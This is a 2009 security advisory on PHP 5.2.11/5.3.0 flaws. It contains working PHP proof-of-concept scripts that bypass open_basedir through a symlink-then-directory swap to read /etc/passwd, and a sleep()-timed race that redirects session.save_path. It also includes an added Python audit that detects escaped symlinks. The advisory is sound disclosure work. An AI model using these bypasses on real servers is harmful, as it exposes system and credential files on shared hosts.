PHP 5.2.12/5.3.1 Multiple Vulnerabilities


SecurityAlert: 6744
CVE: GENERIC-MAP-NOMATCH
Security Risk: High
Remote Exploit: Yes
Local Exploit: Yes
Victim interaction required: No
Exploit Available: Yes
ExploitAlert: 7452
Credit: Maksymilian Arciemowicz
Published: 13.11.2009
Updated: 21.12.2009

SecurityReason Note: PHP 5.2.12 and PHP 5.3.1 are also affected

Affected Software: PHP 5.2.11/5.3.0



Advisory Content:

[ PHP 5.2.11/5.3.0 Multiple Vulnerabilities ]

Author: Maksymilian Arciemowicz
http://SecurityReason.com
Date:
- Dis.: 01.10.2009
- Pub.: 13.11.2009

Risk: Medium

Affected Software:
- PHP 5.3.0
- PHP 5.2.11

Original URL:
http://securityreason.com/achievement_securityalert/70

--- 0. Description ---
PHP is an HTML-embedded scripting language. Much of its syntax is borrowed
from C, Java and Perl with a couple of unique PHP-specific features thrown
in. The goal of the language is to allow web developers to write
dynamically generated pages quickly.

http://lu2.php.net/manual/en/function.symlink.php

symlink: Creates a symbolic link

bool symlink ( string $target , string $link )

--- 1. PHP 5.2.11/5.3.0 Multiple Vulnerabilities ---
The first main problem lies in the open_basedir security model as it applies
to symlinks. Both $target and $link are checked against open_basedir. We can
bypass open_basedir, although the symlink() function itself is not the faulty
part; the issue comes from the false security model designed by PHP.

example:
127# cat sym.php
<?php
symlink("/etc/passwd", "./symlink");
?>
127# php sym.php
PHP Warning: symlink(): open_basedir restriction in effect.
File(/etc/passwd) is not within the allowed path(s): (/www) in
/www/test/sym.php on line 2

Warning: symlink(): open_basedir restriction in effect. File(/etc/passwd)
is not within the allowed path(s): (/www) in /www/test/sym.php on line 2
127#

open_basedir will disallow /etc/passwd.

Let's see:
127# ls -la
total 8
drwxr-xr-x 2 www www 512 Oct 20 00:33 .
drwxr-xr-x 13 www www 1536 Oct 20 00:26 ..
-rw-r--r-- 1 www www 356 Oct 20 00:32 kakao.php
-rw-r--r-- 1 www www 45 Oct 20 00:26 sym.php
127# pwd
/www/test
127# cat kakao.php
<?php
mkdir("abc");
chdir("abc");
mkdir("etc");
chdir("etc");
mkdir("passwd");
chdir("..");
mkdir("abc");
chdir("abc");
mkdir("abc");
chdir("abc");
mkdir("abc");
chdir("abc");
chdir("..");
chdir("..");
chdir("..");
chdir("..");
symlink("abc/abc/abc/abc","tmplink");
symlink("tmplink/../../../etc/passwd", "exploit");
unlink("tmplink");
mkdir("tmplink");
?>

127# php kakao.php
127# ls -la
total 12
drwxr-xr-x 4 www www 512 Oct 20 00:37 .
drwxr-xr-x 13 www www 1536 Oct 20 00:26 ..
drwxr-xr-x 4 www www 512 Oct 20 00:37 abc
lrwxr-xr-x 1 www www 27 Oct 20 00:37 exploit -> tmplink/../../../etc/passwd
-rw-r--r-- 1 www www 356 Oct 20 00:32 kakao.php
-rw-r--r-- 1 www www 45 Oct 20 00:26 sym.php
drwxr-xr-x 2 www www 512 Oct 20 00:37 tmplink
127# cat exploit
# passwd
#
root:*:0:0:god:/root:/bin/csh
...

Now "tmplink" is a directory, so the link "exploit" effectively points to
"../../etc/passwd". We do not need to bypass open_basedir at all; this is a
design mistake. PHP allowed "tmplink/../../../etc/passwd" because, at the
time of the check, ./tmplink/../../../etc/passwd really existed.
So if we want to read another file, we need to create a different directory
structure.

example "/usr/pkg/etc/php.ini":

mkdir("usr");
chdir("usr");
mkdir("pkg");
chdir("pkg");
mkdir("etc");
chdir("etc");
mkdir("php.ini");
chdir("..");
chdir("..");
chdir("..");

PHP will confirm that tmplink/../../../usr/pkg/etc/php.ini really exists.
It is very important to remove the fake link "tmplink" and to create, in the
same place, a directory with the same name.

unlink("tmplink");
mkdir("tmplink");

This is the main trick here: "tmplink" as a directory is only one level deep,
not four.

Under PHP 5.2.11 we can also bypass safe_mode this way. Security measures such
as running PHP through suPHP with the privileges of each user also have their
drawbacks.

We can use our exploit to show this vulnerability. If httpd allows reading
through links (the default), we can create a symlink to / (of course, only if
we have access). If we cannot read the symlink, we can use the next PHP flaw,
the "hazard syphon", to read other files.

example of php hazard (session) (open_basedir=/www):

script0 "/www/test/.htaccess":
php_value session.save_path "/www/test/notyetexists"

The file /www/test/notyetexists does not exist yet.

script1 "/www/test/sessrun.php"
<?php
sleep(60);
session_start();
?>

Now we have 60 seconds to run script2.

script2 "/www/test/runin60.php":

<?php
mkdir("abc");
chdir("abc");
mkdir("tmp");
mkdir("abc");
chdir("abc");
mkdir("abc");
chdir("abc");
mkdir("abc");
chdir("abc");
chdir("..");
chdir("..");
chdir("..");
chdir("..");
symlink("abc/abc/abc/abc","tmplink");
symlink("tmplink/../../../tmp", "notyetexists");
unlink("tmplink");
mkdir("tmplink");
?>

The hazard exists in PHP!

Plan of action:
0. Create .htaccess with 'session.save_path "/www/test/notyetexists"'.
1. Run script1. In the first phase (SAPI) PHP checks privileges to
/www/test/notyetexists, but this file or directory does not exist yet, so
open_basedir will return false.
2. Script1 then sleeps for 60 seconds. In this moment we need to run script2,
which creates the link /www/test/notyetexists pointing to /tmp or another
directory.
3. After 60 seconds script1 calls session_start(), and privileges to
/www/test/notyetexists are not checked at this moment.

As a result, we can use the sleep() function to create a fake delay, and the
first issue helps us create the symlinks.
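Both the open_basedir case and the session.save_path case above share one root cause: the path is checked when the link is written, but only the link text is stored, and that text resolves somewhere else once "tmplink" has been swapped for a shallow directory. As an added example (not part of the advisory, in Python rather than PHP), the audit below re-resolves every symlink under a document root with realpath() and reports the ones that have escaped it; demo() rebuilds the advisory's directory layout in a scratch directory (constructed data) to show the check passing at creation time and the audit catching the link after the swap.

```python
"""Audit a document root for symlinks that resolve outside it (added example,
not from the advisory). The creation-time check resolves the link text once;
re-resolving every stored link with realpath() catches a link whose meaning
changed after "tmplink" was swapped from a deep symlink to a shallow dir."""
import os
import tempfile


def within_base(path, base):
    """True if path, fully resolved, is base itself or lives under it."""
    real, root = os.path.realpath(path), os.path.realpath(base)
    return real == root or real.startswith(root + os.sep)


def audit_symlinks(base):
    """Return (relative link, resolved target) for every symlink under base
    whose resolved target escapes base. os.walk does not descend into links
    but still lists them, so each link is examined exactly once."""
    escaped = []
    for dirpath, dirnames, filenames in os.walk(base):
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            if os.path.islink(path) and not within_base(path, base):
                escaped.append((os.path.relpath(path, base), os.path.realpath(path)))
    return escaped


def demo():
    """Rebuild the advisory's layout in a scratch directory (constructed data)
    and return (accepted_at_creation, audit_before_swap, audit_after_swap)."""
    base = tempfile.mkdtemp(prefix="basedir-demo-")
    os.makedirs(os.path.join(base, "abc", "etc", "passwd"))
    os.makedirs(os.path.join(base, "abc", "abc", "abc", "abc"))
    os.symlink("abc/abc/abc/abc", os.path.join(base, "tmplink"))
    link_text = "tmplink/../../../etc/passwd"
    # A creation-time check sees the text resolve to <base>/abc/etc/passwd.
    accepted = within_base(os.path.join(base, link_text), base)
    os.symlink(link_text, os.path.join(base, "exploit"))
    before = audit_symlinks(base)             # nothing escapes yet
    os.unlink(os.path.join(base, "tmplink"))  # the swap described above
    os.mkdir(os.path.join(base, "tmplink"))
    after = audit_symlinks(base)              # "exploit" now leaves base
    return accepted, before, after


if __name__ == "__main__":
    ok, before, after = demo()
    print("accepted at creation:", ok, "| before:", before, "| after:", after)
```

Run periodically against the real document root (not the scratch directory) to flag links whose targets drifted outside open_basedir after creation.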

--- 2. Exploit ---

open_basedir bypass:
http://securityreason.com/achievement_exploitalert/14

hazard: analogous to the example in this note

--- 3. Fix ---
Fix not available

--- 4. Greets ---
sp3x Infospec Chujwamwdupe p_e_a pi3

--- 5. Contact ---
Author: SecurityReason.com [ Maksymilian Arciemowicz ]
Email: cxib {a.t] securityreason [d00t} com
GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
http://securityreason.com
http://securityreason.pl



References:

http://securityreason.com/expldownload/1/7452/1 (Exploit)
http://securityreason.com/achievement_securityalert/70
http://lu2.php.net/manual/en/function.symlink.php



